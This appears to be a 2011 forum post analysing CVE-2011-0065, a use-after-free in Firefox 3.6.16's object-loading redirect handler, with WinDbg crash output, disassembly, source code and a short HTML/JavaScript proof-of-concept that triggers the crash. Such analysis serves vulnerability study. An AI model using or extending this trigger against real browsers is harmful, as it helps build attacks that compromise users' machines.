-
-
[原创]Analysis CVE2011-0065-Firefox 3.6.16 mChannel use after free vulnerability
-
发表于:
2011-8-19 20:38
61789
-
[原创]Analysis CVE2011-0065-Firefox 3.6.16 mChannel use after free vulnerability
(a78.d94): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0a0e3060 ebx=07ccc184 ecx=0a19f000 edx=0566a100 esi=804b0002 edi=80000000
eip=00857c64 esp=0013f714 ebp=0013f8cc iopl=0 nv up eiplzrnapenc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
<Unloaded_Ed20.dll>+0x857c63:
00857c64 2003 and byte ptr [ebx],al ds:0023:07ccc184=50
0:000> kb
ChildEBPRetAddrArgs to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0013f710 1080df8e 0a0e3060 804b0002 00000000 <Unloaded_Ed20.dll>+0x857c63
0013f8cc 1080e720 07ccc184 0858aab0 00000001 xul!nsObjectLoadingContent::LoadObject+0x108
[e:\builds\moz2_slave\win32_build\build\content\base\src\nsobjectloadingcontent.cpp @ 1081]
0013f8fc 1080eadc 07ccc184 0013f9b4 00000001 xul!nsObjectLoadingContent::LoadObject+0xcd
[e:\builds\moz2_slave\win32_build\build\content\base\src\nsobjectloadingcontent.cpp @ 986]
0013faa0 1080eb2a 07ccc160 00000001 10190b32 xul!nsHTMLObjectElement::StartObjectLoad+0x84
[e:\builds\moz2_slave\win32_build\build\content\html\content\src\nshtmlobjectelement.cpp@ 456]
0013faac 10190b32 00000001 09bcc600 09bcc600xul!nsHTMLObjectElement::DoneAddingChildren+0x17
[e:\builds\moz2_slave\win32_build\build\content\html\content\src\nshtmlobjectelement.cpp@ 174]
0013fac8 10191b42 00000048 00000000 00000000 xul!SinkContext::CloseContainer+0xd2 [e:\builds\moz2_slave\win32_build\build\content\html\document\src\nshtmlcontentsink.cpp @ 1018]
0013fadc 100d873e 07ce80b8 00000048 00000000 xul!HTMLContentSink::CloseContainer+0x32 [e:\builds\moz2_slave\win32_build\build\content\html\document\src\nshtmlcontentsink.cpp @ 2392]
0013faf4 100d8501 00000048 00000000 09bcc600 xul!CNavDTD::CloseContainer+0x5e [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\cnavdtd.cpp @ 2762]
0013fb24 100d8418 00000002 00000048 00000000 xul!CNavDTD::CloseContainersTo+0xd1 [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\cnavdtd.cpp @ 2812]
0013fb3c 1005c8f3 00000048 00000000 05261800 xul!CNavDTD::CloseContainersTo+0x38 [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\cnavdtd.cpp @ 2954]
0013fb58 1005c857 09bcc600 00000000 05261800 xul!CNavDTD::DidBuildModel+0x69 [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\cnavdtd.cpp @ 397]
0013fb70 100c1284 00000000 05261800 05261804 xul!nsParser::DidBuildModel+0x42 [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\nsparser.cpp @ 1611]
0013fb94 10042d6e 00000001 00000001 00000001 xul!nsParser::ResumeParse+0x124 [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\nsparser.cpp @ 2381]
0013fbb8 10042cdc 05261804 052e88ac 00000000 xul!nsParser::OnStopRequest+0x82 [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\nsparser.cpp @ 3029]
0013fbd8 1001e6f2 05261804 052e88ac 00000000 xul!nsDocumentOpenInfo::OnStopRequest+0x56
[e:\builds\moz2_slave\win32_build\build\uriloader\base\nsuriloader.cpp @ 324]
0013fbfc 100786f1 052e88ac 0529a920 00000000 xul!nsBaseChannel::OnStopRequest+0x55 [e:\builds\moz2_slave\win32_build\build\netwerk\base\src\nsbasechannel.cpp @ 681]
0013fc1c 10070fd1 0081d560 056dd670 00817400 xul!nsInputStreamPump::OnStateStop+0x3f
[e:\builds\moz2_slave\win32_build\build\netwerk\base\src\nsinputstreampump.cpp @ 577]
0013fc30 10035121 0529a924 07410b08 056dd660 xul!nsInputStreamPump::OnInputStreamReady+0x4c [e:\builds\moz2_slave\win32_build\build\netwerk\base\src\nsinputstreampump.cpp @ 402]
0013fc40 100f4380 056dd660 0081d560 0013ff34 xul!nsOutputStreamReadyEvent::Run+0x1d [e:\builds\moz2_slave\win32_build\build\xpcom\io\nsstreamutils.cpp @ 192]
0013fc68 100cf5ca 056dd660 00000001 0013fc88 xul!nsThread::ProcessNextEvent+0x230 [e:\builds\moz2_slave\win32_build\build\xpcom\threads\nsthread.cpp @ 527]
Ps:具体调试的时候可以下载火狐的符号,或者自己编译源码(比较麻烦,debug版没编译通过过)例如这样:
SRV*e:\symcache\*http://msdl.microsoft.com/download/symbols;SRV*e:\symcache\*http://symbols.mozilla.org/firefox
0:000>bl
0 e 10499052 0001 (0001) 0:**** xul!nsObjectLoadingContent::OnChannelRedirect
0:000>bpxul!nsObjectLoadingContent::LoadObject
Matched: 1080e653 xul!nsObjectLoadingContent::LoadObject (class nsAString_internal *, int, class nsCString *, int)
Matched: 1080de86 xul!nsObjectLoadingContent::LoadObject (class nsIURI *, int, class nsCString *, int)
Ambiguous symbol error at 'xul!nsObjectLoadingContent::LoadObject'
0:000>bp 1080e653
0:000>bp 1080de86
<html>
<body>
<object id="d"><object>
<script type="text/javascript">
var e;
e=document.getElementById("d");
e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0);
e.data = "";//没这个也行的,触发是在脚本执行完毕后,ps:实际测试是这样的:)
</script>
</body>
</html>
Breakpoint 1 hit
eax=00000003 ebx=0013ef98 ecx=052e9018 edx=109f5228 esi=051c5718 edi=00000000
eip=10499052 esp=0013eca8 ebp=0013ecc8 iopl=0 nv up eiplzrnapenc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
xul!nsObjectLoadingContent::OnChannelRedirect:
10499052 8b4c2408 movecx,dwordptr [esp+8] ss:0023:0013ecb0=00000000
0:000>ddesp+8
0013ecb0 00000000 057369f0 00000000 00897640//第一个参数null 第二个参数new Object,第三个参数0记住这个057369f0,后面用到
0013ecc0 00000000 0013ef68 0013ef68 10129438
0013ecd0 052e9018 00000003 00000003 0013ed80
0013ece0 005092f0 054f9c80 00000000 00379b06
0013ecf0 06060b0c 00000000 030c0ecc 008af0e0
0013ed00 06799403 051c5718 00379def 07122024
0013ed10 052e9018 00000003 0013ed80 00000001
0013ed20 087d1934 80570009 07dcd340 05736460
这个函数汇编代码
xul!nsObjectLoadingContent::OnChannelRedirect:
10499052 8b4c2408 movecx,dwordptr [esp+8]//aOldChannel
10499056 56 push esi
10499057 8b742408 movesi,dwordptr [esp+8]//aNewChannel
1049905b 3b4e1c cmpecx,dwordptr [esi+1Ch]//mChannel=0
1049905e 7407 je xul!nsObjectLoadingContent::OnChannelRedirect+0x15 (10499067)//跳
10499060 b802004b80 mov eax,804B0002h
10499065 eb1a jmpxul!nsObjectLoadingContent::OnChannelRedirect+0x2f (10499081)
10499067 8b4624 moveax,dwordptr [esi+24h] ds:0023:052e903c=00000000//mClassifier
1049906a 85c0 test eax,eax
1049906c 57 push edi
1049906d 8b7c2414 movedi,dwordptr [esp+14h]
10499071 7408 je xul!nsObjectLoadingContent::OnChannelRedirect+0x29 (1049907b)//跳
10499073 8b10 movedx,dwordptr [eax]
10499075 57 push edi
10499076 51 push ecx
10499077 50 push eax
10499078 ff5210 call dwordptr [edx+10h]
1049907b 897e1c movdwordptr [esi+1Ch],edi //0写入mChannel
对应源码:
NS_IMETHODIMP
nsObjectLoadingContent::OnChannelRedirect(nsIChannel *aOldChannel,
nsIChannel *aNewChannel,
PRUint32 aFlags)
{
// If we're already busy with a new load, cancel the redirect
if (aOldChannel != mChannel) {
return NS_BINDING_ABORTED;
}
if (mClassifier) {
mClassifier->OnRedirect(aOldChannel, aNewChannel);
}
mChannel = aNewChannel;
return NS_OK;
}
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!